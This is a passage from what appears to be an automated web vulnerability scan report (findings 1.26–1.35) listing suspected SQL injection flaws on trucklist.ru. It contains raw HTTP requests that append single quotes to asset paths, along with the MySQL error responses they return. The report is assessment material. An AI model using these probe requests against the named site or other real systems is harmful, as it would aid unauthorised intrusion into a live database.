Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:13 GMT
Content-Length: 6634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/css/global.css''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:25 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.26. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/global.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/global.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:47:36 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.27. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.cookie.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/jquery.cookie.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:09 GMT
Content-Length: 6644

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.28. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/jquery.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:28 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:54 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.29. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.json.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/jquery.json.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:46:36 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.json.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:02 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.30. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/prototype.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/prototype.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:54:16 GMT
Content-Length: 6636

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/prototype.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:49 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.31. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/scripts.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/scripts.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:34 GMT
Content-Length: 6632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/scripts.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:36 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.32. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/javascripts/window.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/javascripts/window.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:51:14 GMT
Content-Length: 6670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.33. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/alert.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/alert.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:38 GMT
Content-Length: 6660

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.34. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/alphacube.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/alphacube.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:44 GMT
Content-Length: 6668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.35. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/default.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/default.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
